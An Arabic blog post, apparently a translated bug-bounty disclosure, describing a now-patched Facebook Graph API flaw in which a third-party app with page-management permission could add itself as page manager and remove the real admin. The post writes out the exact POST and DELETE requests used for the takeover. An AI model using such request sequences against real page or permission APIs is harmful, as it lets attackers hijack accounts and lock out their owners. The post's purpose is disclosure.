ثغرة جديدة خطيرة لإختراق صفحات Facebook

تسمح الثغرة الأمنية في نقطة نهاية Facebook business manager لأحد تطبيقات الطرف الثالث باختراق صفحة حساب Facebook بأذونات محدودة وسيفقد الضحية وصول المشرف نهائيًا إلى الصفحة.

بشكل افتراضي ، لا تسمح واجهة تطبيق Facebook لتطبيقات الجهات الخارجية بإضافة أو تعديل أدوار مسؤول الصفحة (أدوار الصفحة مثل مدير أو محرر أو محلل إلخ). يُسمح لتطبيقات الجهات الخارجية بتنفيذ جميع العمليات مثل حالات النشر نيابة عنك ، ونشر الصور ، وما إلى ذلك باستثناء إضافة أدوار المشرف لأنه إذا سمح للتطبيق بإضافة مدراء أو إزالتهم ، فقد يضيف بعض المستخدمين كمسؤول إلى الصفحة وإزالة المالك الفعلي بشكل دائم.

نتيجة بحث الصور عن ‪Hacking Facebook Pages‬‏

من ناحية أخرى ، هناك نقطة نهاية لصفحات العمل تدعى userpermissions والتي تسمح بإضافة أو إزالة أدوار مسؤولي صفحة العمل الذين يتعاملون بالفعل مع أعمال Facebook.

الطلب التالي سيجعل المستخدم المستهدف هو المشرف على الصفحة.

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>

Response:-
true

بعد بضع دقائق من الاختبار ، تعرفت على أن إزالة معلمة العمل من الطلب لم تتسبب في أي خطأ وتسمح لنا بإضافة أي شخص كمسؤول جديد للصفحة وحذف مسؤول الصفحة الفعلي على الصفحة غير التجارية حيث التطبيق لديه إذن إدارة.

هذا هو! أيا كان التطبيق ، إذا كان لديه إذن manager_pages من المسؤول ، فيمكنه اختراق جميع صفحات حسابه على Facebook في غضون ثوانٍ معدودة.

الاستيلاء على الصفحة:

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
true

إزالة الضحية:

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>

Response:-
true

هذا كل شئ! تم اختراق الصفحة المستهدفة!

تم الإبلاغ عن مشكلة عدم الحصانة هذه أمام فريق أمان Facebook وتم حلها تمامًا الآن.

سوف يبدو مربع حوار الأذونات هكذا

Manage pages permission dialog box

إذا تم طلب manager_pages ، يرجى ملاحظة أن هذا التطبيق سيكون قادرًا على إدارة صفحاتك (نشر الحالات ، نشر الصور ، إلخ.)

لا يحتاج الأشخاص للقلق ، فلا يزال بإمكانك تعديل الأذونات التي منحتها للتطبيقات الأخرى هنا.

يمكنك أيضًا قراءة كيفية كسب المال من خلال المدونات في مقالتنا. إنه دليل A-Z على التدوين يساعدك في الحصول على أول شيك لك.

Scroll to Top